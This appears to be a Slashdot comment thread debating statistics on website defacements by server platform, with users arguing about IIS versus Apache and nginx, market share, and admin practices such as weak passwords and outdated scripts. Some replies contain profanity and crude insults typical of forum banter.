Statistic Fibbers ... [AKA: BullShit] ... Why?

[OldHawk777]

M$-Webservers are far more "Likely to be Defaced than L/FOSS websites"; So, SkiifGeek is M$Geek.

If M$ webservers made up 54% of the market,
then L/FOSS and M$-Win webservers would be
proportionally equal in "Likelihood to be Defaced".

However, it is far more likely that L/FOSS (Apache/Google...)
webservers are about +60% of total webservers. This would indicate
(I think) that M$-websites are about 60% (I suspect, two times more) "Likely
to be Defaced than L/FOSS." IOW: Use M$-webservers at your own financial risk.

Numbers are just numbers, but proportions, algorithms, math ... tells all!
Why trust M$-stats in the USA when you can't even trust voting/election numbers.

Re:Statistic Fibbers ... [AKA: BullShit] ... Why?

English, motherfucker! Do you speak it?!

Re:Statistic Fibbers ... [AKA: BullShit] ... Why?

[OldHawk777]

Only when I am fucking with any AC-dogmatist ... you act like you need to get a bj from god.

Re:Statistic Fibbers ... [AKA: BullShit] ... Why?

Some of your S's totally became $'s when you posted, and a lot of your post doesn't make sense. I think you might be having problems with your keyboard.

Re:Statistic Fibbers ... [AKA: BullShit] ... Why?

[OldHawk777]

OK, that one I liked +1 Funny, but does that make you a /. grammar-granny or just an OCD-geek?

Re:Statistic Fibbers ... [AKA: BullShit] ... Why?

[OldHawk777]

Oh, I forgot to mention ... yes there is an intermittent typo problem I have noticed that frequently when striking S immediately after an M or U that it results in a $, but (it is so cute) I just don't want to replace my old clunker kb.

Another odd kb problem is that frequently when I enter a U right after the E ... that a "euro-symbol" magically appears followed by the letter "U". I know, maybe it is a virus, I don't think it is magic, but maybe it is reality ... as in "Reality is self-induced hallucination."

AC, !HAVEFUN!

It's just SPS

So why all the hate against Microsoft for their products if these same problems affect all platforms?

small penis syndrome

Lack of valuable information

[Ximok]

There is one key piece of valuable information missing from these stats: Attack type against OS/Web Server. So what if 300 some attacks were via cracked passwords. Were they all on Linux? where they all on Windows?

It's like saying that 99% of people are murderers, but failing to explain that you only included a 2 year old and everyone else was on death row in your statistic.

I kind of feel that it was irresponsible to publish these statistics without publishing more information.

(I'll gladly retract that comment if someone can produce the desired information of course)

Way to go troll!

You're batting a thousand!

considering majority web servers are linux based..

[xshader]

It is not surprising that a majority of defacements are on linux servers, considering the majority of web servers are linux based. However defacement is not usually a result of the underlining OS but a result of poor web programming practices and using insecure web services (FTP). So who is to blame here? All those noob web programmers that don't follow basic programing practices to prevent SQL injection, improper file permissions, path checks or just plainly horrific access logic. FTP is also to blame, most dumbass IT managers don't know the security hazard FTP is and insist on using it.

Netcraft confirms it

[greg1104]

For once that's on topic. I stated to rant like everybody else on how this was skewed by not taking into account the market share of Apache vs. IIS, but that's not the real story here.

Take a look at the "Webserver defaced" table. It's badly formatted in a couple of respects. Here's a copy of the interesting data with defacement numbers sorted by server platform:

nginx 729
IIS (total) 447
Apache 319
Rapidsite 244
SonataServer 178

nginx doesn't run on Windows; I'd expect most sites deploying it would be on Linux or BSD. Rapidsite runs on a customized Apache, and again while I haven't found a definitive statement here I'd expect virtual hosting using Apache is going to be Linux or BSD as well. I'd welcome corrections here if I'm wrong about that.

Combine this with the Netcraft data and the initial conclusion I would reach is that Linux+Apache is still the most secure platform. The only reason the Linux numbers are so inflated is that they include some really crappy web servers with significant vulnerabilities running something other than stock Apache.

I wish I had the raw data so I could ask some more interesting questions, like how things change you take the stupid user/admin data out. I don't care that it's possible to setup a platform up wrong and get simple vulnerabilities, I only care about how vulnerable a good installation is.

It's pretty simple really

[sexyrexy]

Windows costs money. So in general, you can be pretty sure that a business is behind a Windows server, which means vested interest in keeping it alive, which means at least some level of investment in a somewhat competent administrator to manage them. Linux is free, so every server set up by some random kid, hobbyist, or idiot is not going to drop a grand on Server 2008. They're going to install what they find for free that has easy documentation on setup.

Different Sites, Different Threats

[Aram+Fingal]

A number of people posting in this discussion have pointed out that Apache is used in technically different ways from IIS. A site with lots of complex middle components, PHP, etc. is more likely to use Apache for technical reasons. That shows that there can be a sort of apples to oranges comparison in looking at total statistics. Similarly, what about the possibility that sites who know that they are more likely to be a target for defacement will choose a web server or platform accordingly. Could it be that more sensitive sites tend to pick Apache more often because of real or perceived security advantages and then proceed to get defaced anyway because of poor systems administration, weak passwords, etc.

Re:Different Sites, Different Threats

[gr8scot]

That's all plausible, but all un-confirmed. Since there's nothing to blow up in any case, I don't thing Jamie & Adam are going to be any help getting to the bottom of this riddle.

Re:Why is it that I think this website security ..

[RAMMS+EIN]

Yes, but your approach assumes that people are actually trying to make things secure. The problem is that they aren't.

And frankly, I can't really blame them. When you are just getting started, or when you are under time pressure (often, one of these applies), you are happy enough once you get it to set up so that the happy flow works. Then you move on to other stuff.

And let's face it: security is difficult. There are many factors you don't control, and you must guard against all possible attack vectors while still keeping the system usable. Before you can do a good job at that, there is a _lot_ you need to know. I can imagine that if you are a budding coder, or a sysadmin with no real experience in programming, you'll be hard pressed to even understand a large part of the security literature. Yet I bet it's those people who set up the most websites.

...not

[1a1n]

Netcraft.com's February 2008 report http://news.netcraft.com/archives/2008/02/06/february_2008_web_server_survey.html says that Apache has 48.84% & IIS has 36.05%. This causes some issues for your argument... /i

It's worse than that....

[Joce640k]

They count things like weak passwords as a "hack".

This definitely has no relation to platform.

Re:While I agree with the thrust of the comments..

[gr8scot]

Then why do we always sit here and blast Windows and Microsoft, when in fact good admins keep their boxes running with an optimal uptime, performance, etc? I will agree with the 95/98/ME era, but coming into XP and 2003 Server, I think that it comes down to the skill of the admin to eek out the performance out of the Windows boxes rather than to expect it like most people here do. It seems quite hypocritical to me, but hey.. I'll probably be modded down for coming to a logical argument that might cast Microsoft in a positive light. I'm not a zealot, but I've seen both sides of the coin and I know that Windows boxes can be stable and bulletproof, if you have a good admin. And those admins get blue screens -- when hardware fails. I don't know what happens in Linux, but last I checked it doesn't deal with a bad RAM chip any better than Windows does. 1. How long did it take Microsoft, from its inception, to get comparable to Linux in security?
2. kernel-patch-badram

Kernel patch allowing to use partly-bad RAM modules
This package contains a patch to the Linux kernel, which allows to tell the kernel which parts of a RAM module are bad. This allows you to use old RAM modules, when for example just 1 bit in your 256MB module makes it otherwise unusable.

Packages memtest86 and memtest86+ allow to test the RAM for such problems, and are able to tell you what parameters to give to a badram-enabled kernel. I guess you haven't checked very recently, or very thoroughly -- which is it?

Obligatory

[bigtangringo]

In Soviet Russia, the web surfs you!

Found it is generally bad scripts or file uploads

[prowler1]

I work for a hosting company where we run three different web servers which a customer will use depending on their need (one on Windows, two on Linux). All the defacements I have seen our customers suffer from have been all because the script, shopping cart, forum etc they have downloaded off the web and dropped onto their site is old and has known vulnerabilities and they are not willing to upgrade to a newer version to fix the problems or you get some users who love uploading files as world writable.

To sum up, I would guess that 99% of defacement attacks are due to ill educated or lazy users :P

!Surprisingly, All admins already know this

[n1_111]

How is this a surprise? Because it gets posted on Slashdot? Glad to see the numbers to backup what everyone who works with both platforms already knows.

Re:While I agree with the thrust of the comments..

[HerculesMO]

You totally missed the point.

I'm saying that Windows machines have the ability now, to be reasonably secure enough for 99.9% of attackers to be kept out -- IF the Admins are good enough to keep them that way.

The same is true of Linux.

Additionally, if you found that Linux had the market share of Windows, I'd be hard pressed to see it make the strides over time (from 98 to XP for example) that Microsoft has.

I have friends who are hardcore Linux admins. I have friends who work for Microsoft. I'd say they are both extremely smart, and I'd venture to guess that Microsoft doesn't tend to hire stupid programmers too often. So why is it that people assume Microsoft is stupid -- I mean, their employees are extremely smart, and there are often limits put on what they can, and can't accomplish due to the nature of supporting their business.

That's just my thought. Your immediate defense of Linux and semi-Microsoft bash tells me you're not a lot different than the folks I was mentioning that do exactly that.

Re:While I agree with the thrust of the comments..

[gr8scot]

You totally missed the point.

Correction: I dismissed the point, which I could not have done had I missed it! And, as you acknowledged with "semi-" in your description of my comment as a "bash," I did not dismiss it out of hand, but I specifically dismissed what I see as a false implication that tends to follow from your comment, without discounting in any way the true parts of your statement. So, I'll try to make that clearer, and see whether you then agree that I dismissed your point, fairly: I can agree -- with qualifications that the default configuration is still atrocious, and completely inappropriate to the home market, which is a major and important component of Microsoft's business, which in fact they need in order to retain their "Enterprise" customers -- that more recent Windows systems are not as insecure as their predecessors that you cited, but I will not agree with any statement that suggests that, generally, Windows is [now, and still less for any previous time] "secure" because ...

I'm saying that Windows machines have the ability now, to be reasonably secure enough for 99.9% of attackers to be kept out -- IF the Admins are good enough to keep them that way.

The same is true of Linux.

OK, sure, but the important distinction you're ignoring is that Joe Sixpack isn't, and doesn't have, an Admin. He only has on his Dell "out of the box" the OS and third party anti-virus trialware, a package which is advertised as suitable for him to play video games, visit only the websites he chooses to visit, send data only to the parties he wishes, and generally to pursue his happiness by extending his practical ability to exercise his rights to speak and associate as he chooses with only those whom he chooses. In short, Windows is presented as a commodity or appliance, and fails to deliver on claims that are not made by Linux at all, generally. Using Windows as-is "out of the box" in fact demonstrably diminishes his practical ability to associate freely according to his wishes, which is my greatest complaint about Microsoft. An unsecured web server vs. an unsecured home user's Internet/multimedia + maybe word processing/financial planning appliance is not a legitimate comparison, and that in a nutshell is the whole point, and the kernel of my refutation of your claim that I "missed" your point. I didn't miss it, I disagree with it. If you really enjoy sarcasm for its own sake, or if you really want to advocate for Microsoft, you might want to keep reading. I feel it's only fair to warn you, that although I thought your tone was pretty moderate and I wanted to discuss civilly, your content, especially the idea that Microsoft is criticized unfairly on Slashdot, was like Kryptonite to my Supermanners. But, I had too much fine writing it to delete it all and just say "but Linux doesn't target Joe Sixpack, then paint a target on him." /warning

Additionally, if you found that Linux had the market share of Windows, I'd be hard pressed to see it make the strides over time (from 98 to XP for example) that Microsoft has.

Why? Would more users, more contributing programmers or more revenue be the problem, or something else even funnier? What "point" are you going to say I have "totally missed" now? ;-) I have friends who are hardcore Linux admins. I used to, but their bellies are flabby now. They're more like beer belly Linux admins these days.

I have friends who work for Microsoft. I'd say they are both extremely smart, and I'd venture to guess that Microsoft doesn't tend to hire stupid programmers too often. So why is it that people assume Microsoft is stupid

I don't know. You'd have to ask somebody who has said that. I talk about the operating system and the marketing, not the people. Well, except recently for Steve Ballmer, but I have the impression you're fair enough, or recognize the need to publicly